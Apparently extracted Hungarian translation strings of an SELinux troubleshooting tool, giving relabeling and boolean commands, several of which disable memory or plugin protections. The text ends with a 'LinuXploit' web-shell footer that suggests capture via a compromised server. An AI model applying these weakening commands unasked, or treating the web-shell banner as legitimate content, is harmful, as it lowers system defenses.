    Ha az SELinux beállításon kívül minden engedélyt meg szeretne tartani,
    akkor használja a „cp -p” parancsot.
    
    A fájl beállítását megváltoztatni a chcon -R -t rsync_data_t '$TARGET_PATH' parancs végrehajtásával lehet.
    Az alapértelmezett fájl beállítást szintén meg kell változtatni, hogy az megmaradjon teljes újracímkézés esetén is: semanage fcontext -a -t rsync_data_t '$FIX_TARGET_PATH'
    
    A fájl beállítását megváltoztatni a chcon -R -t samba_share_t '$TARGET_PATH' parancs végrehajtásával lehet.
    Az alapértelmezett fájl beállítást szintén meg kell változtatni, hogy az megmaradjon teljes újracímkézés esetén is: semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH'
    
    A fájl beállítását a chcon -t public_content_t '$TARGET_PATH' parancs végrehajtásával lehet megváltoztatni.
    Az alapértelmezett fájl beállítás fájlokat is meg kell változtatni, hogy a teljes újracímkézés ne rontsa el a változásokat:
    semanage fcontext -a -t public_content_t '$FIX_TARGET_PATH'
    
    A fájl beállítását megváltoztatni a chcon -t swapfile_t '$TARGET_PATH' parancs végrehajtásával lehet.
    Az alapértelmezett fájl beállítást szintén meg kell változtatni, hogy az megmaradjon teljes újracímkézés esetén is: semanage fcontext -a -t swapfile_t '$FIX_TARGET_PATH'
    
    A fájl beállítását megváltoztatni a chcon -t virt_image_t '$TARGET_PATH' parancs végrehajtásával lehet.
    Az alapértelmezett fájl beállítást szintén meg kell változtatni, hogy az megmaradjon teljes újracímkézés esetén is: semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'
    
    A fájl beállítását megváltoztatni a chcon -t xen_image_t '$TARGET_PATH' parancs végrehajtásával lehet.
    Az alapértelmezett fájl beállítást szintén meg kell változtatni, hogy az megmaradjon teljes újracímkézés esetén is: semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH'
    
    A számítógépes rendszer újracímkézése a következő paranccsal
    végezhető el: "touch /.autorelabel; reboot" (rendszergazdai
    jogosultságot igényel).
    
    Készíthet helyi szabályzat modult a hozzáférés engedélyezésére
    – lásd <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a>.

    Kérjük tegyen hibabejelentést.
    
    Készíthet helyi szabályzatot, hogy megengedi-e ezt a hozzáférést
    – lásd <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a>
    
    Visszaállíthatja az alap beállítást erre a rendszer kontextusra a restorecon parancs
    végrehajtásával. A restorecon visszaállítás: 'restorecon '$SOURCE_PATH'.
    Visszaállíthatja az alap beállítást e fájlra a restorecon parancs
    végrehajtásával.  restorecon '$TARGET_PATH', ha e fájl mappa,
    akkor rekurzívan is teheti: restorecon -R '$TARGET_PATH'.
    
    A rendszer komoly veszélyben lehet!
    
    A rendszer komolyan megsérülhetett! $SOURCE_PATH alacsony rendszermag memórián próbált meg mmap műveletet végrehajtani.
    
    A rendszer komoly veszélyben lehet! $SOURCE_PATH rendszermag modult próbált betölteni.
    
    A rendszer komoly veszélyben lehet! $SOURCE_PATH megpróbálta megváltoztatni a SELinux kényszerítést.
    
    A rendszer komolyan sérülhetett! $SOURCE_PATH rendszermag beállítást próbált meg megváltoztatni.
    
Iktassa ki az IPV6 protokollt helyesen.
    
Akár eltávolítja a mozplugger csomagot a  'yum remove mozplugger' paranccsal
vagy kikapcsolja az SELinuxvezérlését a Firefoxon pluginokon keresztül.
setsebool -P unconfined_mozilla_plugin_transition 0
Ha úgy dönt, hogy folytatja a kérdéses program futtatását, akkor 
engedélyezze e műveletet.  Ezt teheti a parancssorból a következő
végrehajtásával:

# setsebool -P mmap_low_allowed 1

Megpróbált elhelyezni egy típust ezen: %s, ami nem egy fájltípus. Ez nem megengedett, hozzá kell rendelnie a fájltípust. Ezt kilistázhatha a seinfo parancs segítségével.

execstack -s LIBRARY_PATH.  „$BOOLEAN” és a(z) „$WRITE_BOOLEAN” logikai érték igazra állítása
    engedélyezi e hozzáférést: „setsebool -P $BOOLEAN=1 $WRITE_BOOLEAN=1”
    Figyelmeztetés: „$WRITE_BOOLEAN” logikai
    érték igazra állítása engedélyezi az ftpd szolgáltatásnak
    az összes nyilvános tartalom (a public_content_t típusú fájlok
    és könyvtárak) írását is azon felül, hogy írhatja a
    CIFS-fájlrendszereken levő fájlokat és könyvtárakat.
    # semanage fcontext -a -t SIMILAR_TYPE '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH%s'
# restorecon %s -v '$FIX_TARGET_PATH'# semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage port -a -t %s -p %s $PORT_NUMBER# semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER
    ahol a PORT_TYPE az egyik a következőkből: %s.A folyamat valószínűleg betörési kísérlet a gépére.Adja a  
net.ipv6.conf.all.disable_ipv6 = 1
a /etc/sysctl.conf fájlhoz
Lépjen kapcsolatba a biztonsági adminnal és jelentse ezt a problémát.Helyreállítja
KontextustBeállítás visszaállításaSELinux megakadályozta a $SOURCE_PATH "$ACCESS" hozzáférését.Kapcsolja ki a memória védelmetElolvashatja '%s' man oldalt a további részletekért.Valószínűleg betörtek a gépére.Adja meg az SELinux számára erről, azzal hogy engedélyezi a '%s' boolean-t.
Meg kell hogy változtassa a cimkét itt: $FIX_TARGET_PATHMeg kell változtatnia a cimkét ezen: $TARGET_BASE_PATHmegváltoztathatja a cimkét ezen:  $TARGET_BASE_PATH  erre: public_content_t vagy public_content_rw_t cimkéjűre.Meg kell változtatnia a cimkét itt: $TARGET_BASE_PATH'Meg kell változtatnia a cimkét a $TARGET_PATH a hasonló típusú eszközért.Meg kell változtatnia a cimkét itt: '$FIX_TARGET_PATH'Ezt jelentenie kell, mint hibát.
Hogy engedélyezze ezt a hozzáférést előállíthat egy helyi szabálymodult.Jeletse ezt hibaként. 
Előállíthatja a helyi szabályzat modult hogy ne auditálja ezt a hozzáférést.execstack -c %sha úgy érzi hogy lehetséges, hogy feltörtéksetsebool -P %s %skapcsolja be a teljes auditálást hogy a teljes elérési utat megkapja a zavaró fájl kapcsán és készítsen másik hibaüzenetet újra.Ha a SELinux beállításon kívül minden engedélyt meg szeretne tartani, akkor használja a „cp -p” parancsot.futtathatja a restorecon parancsot.előfordulhat hogy támadás alatt van, amióta egy szabályozott alkalmazásnak nincs soha szüksége ilyen hozzáférésre.úgy tűnik támadás alatt lehet a gépe, mivel a szabályozott alkalmazásoknak nem szabad szüksége lennie ilyen hozzáférésre.támadás alatt lehet a gépe, mivel ez egy igen veszélyes hozzáférés.meg kell változtatnia a cimkézést itt: $TARGET_PATH.ki kell javítania a cimkéket.el kell mozgatnia a cert fájlt a ~/.cert mappábaválasztania kell egy érvényes fájl cimkét.el kell távolítania a mozplugger csomagot.be kell állítania az SELinux-ot hogy lehetővé tegyeel kell mondania SELinuxról eztmeg kell adnia az SELinux számára erről, hogy engedélyezi a  'httpd_unified' és 'http_enable_cgi' boolean-okatmeg kell adnia az SELinux számára erről, azzal hogy engedélyezi a vbetool_mmap_zero_ignore boolean-t.ezt meg kell adnia az SELinux számára, azzal hogy engedélyezi a wine_mmap_zero_ignore boolean-tki kell kapcsolnia az SELinux vezérléseit a Chrome pluginjaira.ki kell kapcsolnia az SELinux vezérléseit a Firefox pluginjain.cimkéket kell hozzáadniameg kell változtatnia a cimkét a $TARGET_PATH számára public_content_rw_t cimkére, és potenciálisan be kell kapcsolni a allow_httpd_sys_script_anon_write boolean-t.teljesen újra kell cimkézniejelentenie kell egy hibát.
Ez egy potenciálisan veszélyes, kockázatos hozzáférés.jelentse a hibát. Ez egy potenciálisan veszélyes hozzáférési lehetőség.be kell állítani a /proc/sys/net/ipv6/conf/all/disable_ipv6 modult 1-esre és ne tegye blacklist-re azt.másik parancsot kell alkalmaznia. Nincs jogosultsága hogy megtartsa az SELinux beállításait a cél fájlrendszerében.ki kell törölnie az execstack jelzést és ellenőrizze, hogy a $SOURCE_PATH jól működik, vagy sem.
Jelentse ezt, mint hibát erre a csomagra: %s. 
Magát az execstack jelzést, pedig törölheti ezzel a parancssal:

Youez - 2016 - github.com/yon3zu
LinuXploit